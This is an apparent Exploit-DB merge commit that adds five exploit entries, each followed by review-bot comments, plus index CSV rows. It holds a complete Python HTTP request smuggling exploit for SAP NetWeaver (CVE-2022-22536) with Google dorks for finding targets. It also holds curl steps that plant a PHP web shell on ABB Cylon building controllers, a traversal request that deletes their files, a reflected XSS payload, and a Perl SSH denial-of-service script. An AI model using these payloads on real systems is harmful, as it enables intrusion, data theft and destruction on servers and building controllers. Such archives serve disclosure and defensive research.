Merge remote-tracking branch 'exploitdb/main'

Brendan McDevitt 2025-04-04 00:01:15 +00:00
commit 4a46a3ba95
6 changed files with 647 additions and 1 deletions


@ -0,0 +1,359 @@
# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE : 2022-22536
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
------
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
becodoexploit.com
----------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit Type: HTTP Request Smuggling (Content-Length-based)
Impact: ACL Bypass, Internal Access
More information and explanations:
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
----------------------------------------------------------------------------
Sample Payload:
----------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTph
Content-Length: 89
0\r
\r
GET /heapdump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
----------------------------------------------------------------------------
Expected Response:
----------------------------------------------------------------------------
HTTP/1.1 200 OK
server: SAP NetWeaver Application Server
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
sap-cache-control: +3600
date: Tue, 01 Apr 2025 20:49:02 GMT
content-length: 4465
content-type: text/html
connection: Keep-Alive
x-dummy: 0
----------------------------------------------------------------------------
Indicators of Success:
- Status code 200 for internal endpoints
- Difference between direct access (403/404) and smuggled (200)
- Access to otherwise restricted SAP services via loopback injection
----------------------------------------------------------------------------
Example Paths Tested:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump/
- /ctc/ConfigServlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
----------------------------------------------------------------------------
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Google Dorks:
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
intitle:"SAP NetWeaver" "SAP J2EE Engine"
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
intitle:"SAP NetWeaver Administrator" inurl:/nwa
inurl:"/sap/bc/webdynpro" -site:sap.com
inurl:"/sap/public" "SAP NetWeaver"
inurl:"/sap/admin/public/default.html"
inurl:"/webdynpro/welcome/Welcome.html"
inurl:"/sap/public/info.jsp"
"Powered by SAP NetWeaver" inurl:sap
intitle:"SAP Web Dispatcher Administration"
----------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os
init(autoreset=True)
BANNER = f"""
{Fore.WHITE}
+---------------------------+
(\__/\ Breaking the Gate |
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
/ つ {Fore.WHITE}HTTP Request Smuggler |
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
+---------------------------+
"""
def detect_sap_version(host, port, is_https):
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port, timeout=5)
conn.request("GET", "/")
res = conn.getresponse()
headers = {k.lower(): v for k, v in res.getheaders()}
server_header = headers.get("server", "Unknown")
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
Header: {Fore.CYAN}{server_header}\n")
return server_header
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
version: {e}\n")
return "Unknown"
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
def try_file_read(host, port, is_https, verbose):
test_paths = [
"/sap/public/bc/icf/info",
"/sap/public/info.jsp",
"/sap/public/test/test.jsp",
"/sap/bc/webdynpro/sap/appl_soap_management",
"/sap/public/bc/soap/rfc",
"/webdynpro/welcome/Welcome.html",
"/sr_central",
"/useradmin/.jsp",
"/heapdump/",
"/startPage",
"/crossdomain.xml",
"/ctc/ConfigServlet",
"/webdynpro/resources/sap.com/tc~lm~config~content/",
"/sld",
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
"/sap/public/bc/icf/logon.html",
"/sap/bc/webdynpro/sap/itadmin",
"/sap/public/bc/sec/saml2",
"/sap/public/bc/webdav"
]
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
for path in test_paths:
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
conn.request("GET", path)
res_direct = conn.getresponse()
content_direct = res_direct.read().decode(errors="ignore")
direct_status = res_direct.status
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
access for {path}: {e}")
continue
body = build_smuggled_request(path)
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
try:
conn = conn_class(host, port)
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
smuggled_headers = res.getheaders()
content_smuggled = res.read().decode(errors="ignore")
smuggled_status = res.status
status_color = Fore.GREEN if smuggled_status !=
direct_status else Fore.RED
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
{Style.BRIGHT}{Fore.WHITE}Direct Access:
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
{status_color}({smuggled_status}){Style.RESET_ALL}")
if smuggled_status == direct_status:
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
for {path}\n")
with open("poc.txt", "a") as f:
f.write(f"\n--- Path: {path} ---\n")
f.write(f"Direct: {direct_status}\nSmuggled:
{smuggled_status}\n")
f.write(f"Smuggled Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Smuggled Response Headers:\n")
for h in smuggled_headers:
f.write(f"{h[0]}: {h[1]}\n")
if verbose:
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
f.write(f"\nDirect Response:\n{content_direct}\n")
if verbose:
print(f"\n{Fore.BLUE}>>> Sent Payload to
{path}:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST
/sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if smuggled_status == 500
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
{smuggled_status}{Style.RESET_ALL}")
for h in smuggled_headers:
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
def send_smuggled_request(target, verbose):
parsed = urlparse(target)
is_https = parsed.scheme == 'https'
port = parsed.port or (443 if is_https else 80)
host = parsed.hostname
print(BANNER)
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
exploitation on {host}:{port}\n")
detect_sap_version(host, port, is_https)
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
try:
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
content = res.read().decode(errors="ignore")
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
is_exploit_success = res.status in [200, 500, 403, 302]
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
else ''}! {Fore.YELLOW}CVE-2022-22536")
print(f"{Fore.WHITE}{'-'*60}\n")
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if res.status == 500 else
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
for h in res.getheaders():
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
if verbose:
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
with open("poc.txt", "w") as f:
f.write(f"Initial Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Initial Response:\n{status_display}\n")
for h in res.getheaders():
f.write(f"{h[0]}: {h[1]}\n")
f.write(f"\n{content}\n")
print("\n")
if is_exploit_success:
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
successfully and triggered an internal processing behavior. This
indicates a potential HTTP request smuggling condition.")
else:
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
trigger the expected behavior. Target may not be vulnerable.")
print(f"\n{Fore.WHITE}{'-'*60}\n")
try_file_read(host, port, is_https, verbose)
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
def main():
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
parser.add_argument("-u", "--url", required=True, help="Target
full URL (e.g., http://host:port)")
parser.add_argument("--verbose", "-v", action="store_true",
help="Show full headers and responses")
args = parser.parse_args()
os.system('clear')
send_smuggled_request(args.url, args.verbose)
if __name__ == "__main__":
main()
----------------------------------------------------------------------------
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
https://launchpad.support.sap.com/#/notes/3123396
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/
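Review bot: The probe connections in `try_file_read` (L165, L183) and `send_smuggled_request` (L250) are opened without a timeout and never closed — only `detect_sap_version` passes `timeout=5`, and none of the three calls `conn.close()` — so an unresponsive target stalls the whole run and every path probed leaks a socket; `conn = conn_class(host, port, timeout=5)` with a `finally: conn.close()` around each probe fixes both. The success heuristic on L257, `res.status in [200, 500, 403, 302]`, reports "Exploit executed successfully" for a 403 or 500 that a patched server returns too, so that banner is not a vulnerability confirmation and the write-up should say so; the direct-versus-smuggled status comparison in `try_file_read` is the only meaningful indicator. Note also that `poc.txt` (L199, L274) receives full response bodies — e.g. whatever `/heapdump/` returns — in plain text in the working directory, which deserves at least a comment given the sensitivity of that output. As rendered here the listing has lost its indentation and wraps several statements and string literals mid-line (L120–121, L135–136), so it is not runnable as shown.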


@ -0,0 +1,104 @@
ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a remote code execution
vulnerability. The vulnerable uploadFile() function in bigUpload.php
improperly reads raw POST data using the php://input wrapper without
sufficient validation. This data is passed to the fwrite() function,
allowing arbitrary file writes. Combined with an improper sanitization
of file paths, this leads to directory traversal, allowing an attacker
to upload malicious files to arbitrary locations. Once a malicious file
is written to an executable directory, an authenticated attacker can
trigger the file to execute code and gain unauthorized access to the
building controller.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5828
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php
CVE ID: CVE-2024-6298
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
1.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "<?php\r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"
2.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> H "Content-Type: application/x-www-form-urlencoded"
3.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"
4.
$ curl http://192.168.73.31/ZSL.php?j=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
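Review bot: The advisory gives no fixed firmware version or vendor mitigation — `Firmware: <=3.08.01` on L319 is only an upper bound — so a reader cannot tell which release closes CVE-2024-6298; a line such as `Fixed in: <version per vendor advisory>` or a pointer to the ABB advisory is the first thing a defender looks for here. The description on L330 says an authenticated attacker is required, while the reproduction steps carry only a `PHPSESSID` cookie, so the write-up should state whether that session has to be an authenticated one. From a detection standpoint the decisive request is step 3 (L391–L394), where the `name` parameter of `action=finish` carries the traversal sequence and places the file under the web root; that parameter and any write into `htmlroot` are what to log and alert on.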


@ -0,0 +1,24 @@
# Exploit Title: Reflected XSS in Elaine's Realtime CRM Automation v6.18.17
# Date: 09/2024
# Exploit Author: Haythem Arfaoui (CBTW Team)
# Vendor Homepage: https://www.elaine.io/
# Software Link:
https://www.elaine.io/en/products/elaine-marketing-automation/
# Version: 6.18.17 and below
# Tested on: Windows, Linux
# CVE : CVE-2024-42831
# Description
A reflected cross-site scripting (XSS) vulnerability in Elaine's Realtime
CRM Automation v6.18.17 allows attackers to execute arbitrary JavaScript
code in the web browser of a user via injecting a crafted payload into the
dialog parameter at wrapper_dialog.php.
# Steps to reproduce:
1. Navigate to any website that contains Elaine's Realtime CRM Automation
2. Navigate to this endpoint: /system/interface/wrapper_dialog.php
3. Append the payload *a"%20onafterscriptexecute=alert(document.domain)> *in
the *"dialog*" param and execute the request
4. Final URL
: /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>
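Review bot: The affected range is given as `6.18.17 and below` (L408) with no fixed version and no vendor advisory link, so a reader cannot tell whether a patch exists for CVE-2024-42831; a `# Fixed in: <version, if published>` line would settle that. `# Tested on: Windows, Linux` (L409) names operating systems, but for a reflected XSS the relevant variable is the browser, which should be stated instead. The stray `*` characters around the payload and the parameter name in steps 3–4 (L419–L420) look like rich-text formatting leaked from an e-mail client and should be stripped from the write-up.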


@ -0,0 +1,86 @@
ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>
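Review bot: The description refers to `'databasefiledelete.php'` (L436) while the request targets `databaseFileDelete.php` (L488); on the Linux hosts listed under Tested on those are different paths, so the write-up should use the real name consistently — it matters for anyone writing a log or WAF rule. As with the companion ABB advisory in this commit, no fixed firmware version is given (`Firmware: <=3.08.01`, L431), so `Fixed in: <version per vendor advisory>` or a vendor reference is missing. The traversal travels in the `file0` parameter (L489) and the only response is the `Refresh` redirect on L493 — success is silent — which is worth stating explicitly, since defenders will find no error in the application's reply and must rely on request logging or file-integrity monitoring.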


@ -0,0 +1,68 @@
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
# Google Dork: N/A
# Date: 13 january 2024
# Exploit Author: Fernando Mengali
# Vendor Homepage: https://prosshd.com/
# Software Link: N/A
# Version: 1.2 20090726
# Tested on: Windows XP
# CVE: CVE-2024-0725
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {s
$cmd="clear";
}
system("$cmd");
intro();
main();
print "\t ==> Connecting to webserver... \n\n";
sleep(1);
my $i=0;
print "\t ==> Exploiting... \n\n";
my $payload = "\x41" x 500;
$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();
print "\t ==> Done! Exploited!";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port, $username, $password) = @ARGV;
unless (defined($ip) && defined($port)) {
print "\n\tUsage: $0 <ip> <port> <username> <password> \n";
exit(-1);
}
}
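Review bot: The script as published does not parse or run: the `else` branch on L510 carries a stray `s` (`} else {s`), `main()` assigns `$ip` (L541) but the connect on L522 reads `$host`, which is never set, and there is no `use Net::SSH2;` (nor `use strict`/`use warnings`) anywhere in the listing. The platform check `$sis eq "windows"` (L508) is also wrong — Perl reports `MSWin32` on Windows — so the `cls` branch is dead and `clear` is always run, which is harmless but contradicts `# Tested on: Windows XP`. Readers using this entry to confirm a patch or build a regression test should treat it as documentation of the trigger condition (an oversized SCP path argument) rather than a working reproducer, and a note to that effect belongs in the header.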


@ -8420,7 +8420,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35606,exploits/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",remote,linux,,2011-04-11,2014-12-25,1,CVE-2011-0285;OSVDB-71789,,,,,https://www.securityfocus.com/bid/47310/info
35132,exploits/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",remote,linux,,2010-12-21,2014-10-31,1,,,,,,https://www.securityfocus.com/bid/45537/info
16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,remote,linux,,2011-01-08,2011-03-06,1,OSVDB-69934,"Metasploit Framework (MSF)",,,,
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,,2020-12-02,2020-12-02,0,,,,,,
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,,2020-12-02,2025-04-02,0,CVE-2003-20001,,,,,
41,exploits/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,remote,linux,80,2003-06-09,2016-02-10,1,OSVDB-11873;CVE-2003-0437,,,,http://www.exploit-db.commnogosearch-3.1.20.tar.gz,
37949,exploits/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",remote,linux,,2012-10-17,2017-10-17,1,CVE-2012-4528;OSVDB-86408,,,,,https://www.securityfocus.com/bid/56096/info
26422,exploits/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,remote,linux,,2013-06-24,2013-06-24,1,CVE-2012-6495;OSVDB-88825;CVE-2012-6081,"Metasploit Framework (MSF)",,,http://www.exploit-db.commoin-1.9.5.tar.gz,
@ -11441,6 +11441,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28725,exploits/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",remote,multiple,,2006-09-28,2013-10-04,1,CVE-2006-5114;OSVDB-29489,,,,,https://www.securityfocus.com/bid/20244/info
4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Remote Command Execution",2008-01-09,"Luigi Auriemma",remote,multiple,7210,2008-01-08,,1,OSVDB-40210;CVE-2008-0244,,2008-sapone.zip,,,
30265,exploits/multiple/remote/30265.txt,"SAP Message Server - 'Group' Remote Buffer Overflow",2007-07-05,"Mark Litchfield",remote,multiple,,2007-07-05,2013-12-13,1,CVE-2007-3624;OSVDB-38096,,,,,https://www.securityfocus.com/bid/24765/info
52109,exploits/multiple/remote/52109.txt,"SAP NetWeaver - 7.53 - HTTP Request Smuggling",2025-04-02,C41Tx90,remote,multiple,,2025-04-02,2025-04-02,0,CVE-2022-22536,,,,,
25445,exploits/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000,2013-05-14,2013-05-14,1,OSVDB-93537,"Metasploit Framework (MSF)",,,,
25446,exploits/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000,2013-05-14,2013-05-14,1,OSVDB-93538;OSVDB-93537;OSVDB-93536;OSVDB-93535;OSVDB-93534;OSVDB-93533;OSVDB-93532;OSVDB-100704,"Metasploit Framework (MSF)",,,,
38805,exploits/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",remote,multiple,,2015-11-25,2015-11-25,1,CVE-2013-6025;OSVDB-98655,,,,,https://www.securityfocus.com/bid/63193/info
